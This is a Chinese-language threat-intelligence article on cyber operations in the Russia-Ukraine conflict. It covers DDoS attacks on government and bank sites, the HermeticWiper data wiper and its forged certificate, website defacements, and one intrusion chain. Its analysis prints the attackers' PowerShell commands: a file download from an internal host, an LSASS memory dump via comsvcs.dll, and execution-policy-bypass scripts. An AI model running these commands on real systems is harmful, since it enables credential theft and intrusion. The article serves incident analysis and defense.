九维团队-暗队（情报）| 俄乌冲突中的网络行动（一）

2022年2月23日基辅当地时间16时30分前后 - 俄乌全面冲突前夕，乌克兰网络警察局（Ukrainian Cyber Police）发布消息称：“乌克兰境内多个政府机构（包括外交部、国防部、内政部、安全局及内阁等）以及两家大型银行的网站再次沦为DDoS攻击的受害者”。几个小时后，安全公司ESET和Symantec表示在乌克兰境内的银行、政府承包商、国防、航空和IT服务领域的数百个系统上检测到名为HermeticWiper/FoxBlade的破坏性数据擦除软件，导致相关机构的系统设备数据遭到摧毁。

根据网络和研究所的数据显示，俄乌冲突期间，总计记录1175起网络攻击和网络行动，其中平均每周19.3起。如下图所示：

图源：网络和平研究所

在冲突背景下观察到的主要威胁包括数据擦除器、恶意软件、DDoS攻击、勒索软件、网络间谍、数据泄露、信息行动和网站污损。如下图所示：

图源：网络和平研究所

乌克兰冲突不仅发生在物理领域，还包括网络威胁的独特组合。在冲突背景下，有八种主要的网络威胁有时用于破坏、中断、误导和武器化数据。这些攻击的记录不仅提供了网络在俄乌冲突中的作用的洞察力，而且还提供了在未来武装冲突中的作用。

攻击类型分布，网络攻击以DDoS和数据泄露为主，如下图所示：

图源：网络和平研究所

1.破坏性网络行动

DDoS攻击

多个情报源表明，此次DDoS攻击由mirai、gafgyt等多个僵尸网络发起。

 来自 NetBlocks 的网络数据证实，2022 年 2 月 24 日星期四上午，乌克兰第二大城市哈尔科夫（Kharkiv）的互联网服务严重中断。

值得一提的是，攻击发生后不久，乌克兰情报部门认为这些攻击与俄罗斯政府支持的黑客组织有关。

此次攻击的目标包括乌克兰境内多个政府机构（包括外交部、国防部、内政部、安全局及内阁等）以及两家大型银行的网站，从目标上来看，很明显是有针对性的破坏行动。

2.破坏性定向攻击行动

针对乌克兰境内多个政府机构的DDoS攻击事件发生后的几小时，一款名为HermeticWiper的破坏性数据擦除软件，在乌克兰境内的银行、政府承包商、国防、航空和IT服务领域的数百个系统上被检测到，导致相关机构的系统设备数据遭到摧毁。

其中两个乌克兰政府承包商，一个承包商在乌克兰和拉脱维亚设有办事处，另一个在乌克兰和立陶宛设有办事处，而只在承包商在拉脱维亚和立陶宛的机器上发现了感染，在乌克兰的公司机器上没有发现任何感染。此举说明黑客只针对支持乌克兰政府的特定角色的组织。

*HermeticWiper工作原理

通过对HermeticWiper样本进行研究发现，样本最早的编译时间为2021年12月28日，说明黑客早在几个月前就已经进入受害者网络。

随着事态的发展，我们观察到更多从乌克兰上传到Virustotal的HermeticWiper样本，其中部分样本的编译时间为攻击发生前5小时，由此推断，被黑客攻破的系统越来越多。

通过分析HermeticWiper样本的数字证书发现，该数字证书以名为 "Hermetica Digital Ltd "的公司签发，有效期至2021年4月。目前，我们还没有看到任何使用此证书签名的合法文件。因此，攻击者可能使用空壳公司来颁发此数字证书。

3.网站污损

在发现HermeticWiper恶意软件的同时，我们还在2月23日目睹了第二轮的网站污损。这些攻击似乎复制了一个月前1月14日利用OctoberCMS漏洞的攻击中观察到的信息模板，同时添加了一个.onion的网址和一条红色字体的信息，翻译为："你需要证据吗，请查看后面的链接"。

.onion网站链接到一个自称为“自由平民”的实体，并提供出售包含乌克兰公民个人数据的数据库。在过去 24 小时内，泄密部分的实体名单已扩大到 48 个gov.ua域和一家为飞机和直升机制造发动机的乌克兰公司 ( motorsich[.]com )。

初步迹象表明，袭击可能已经准备了一段时间。时间证据表明，最早从 2021 年 11 月开始的潜在相关恶意活动。但是，我们将继续更进和验证调查结果。

在针对乌克兰一个组织的攻击中，攻击者似乎已于2021年12月23日通过针对Microsoft Exchange Server的恶意SMB活动获得了对网络的访问权限，然后窃取了相关凭据。在2月23日部署数据擦除器之前，还于1月16日安装了一个Webshell。

攻击者可能利用Tomcat漏洞来执行PowerShell命令。解码后的PowerShell用于从受害者网络上的内部服务器下载JPEG文件。

cmd.exe/Q/cpowershell -c "(New-Object System.Net.WebClient).DownloadFile('hxxp://192.168.3.13/email.jpeg','CSIDL_SYSTEM_DRIVEtempsys.tmp1')" 1 > \127.0.0.1ADMIN$__1636727589.6007507 2>&1

*左右滑动查看更多

在此活动之后，PowerShell被用于从受感染的机器中转储凭据：

cmd.exe/Q/c powershell -c "rundll32 C:windowssystem32comsvcs.dll MiniDump 600 C:asmappdatalocalmicrosoftwindowswinupd.log full" 1> \127.0.0.1ADMIN$__1638457529.1247072 2>&1

*左右滑动查看更多

在上述活动之后，执行了几个未知的 PowerShell 脚本。

powershell -v 2 -exec bypass -File text.ps1powershell -exec bypass gp.ps1powershell -exec bypass -File link.ps1

*左右滑动查看更多

五分钟后，HermeticWiper恶意软件被部署。

2008年俄罗斯－格鲁吉亚冲突中，俄罗斯实施任何封锁或投放任何炸弹之前，网络攻击者首先黑掉播报地区信息的新闻资讯和政府网站，俄罗斯随即展开军事行动。黑客专门利用旨在保护平民和传播信息的网站。现有的数据表面，俄罗斯确实在相当程度上复刻了2008年格鲁吉亚行动的后半段。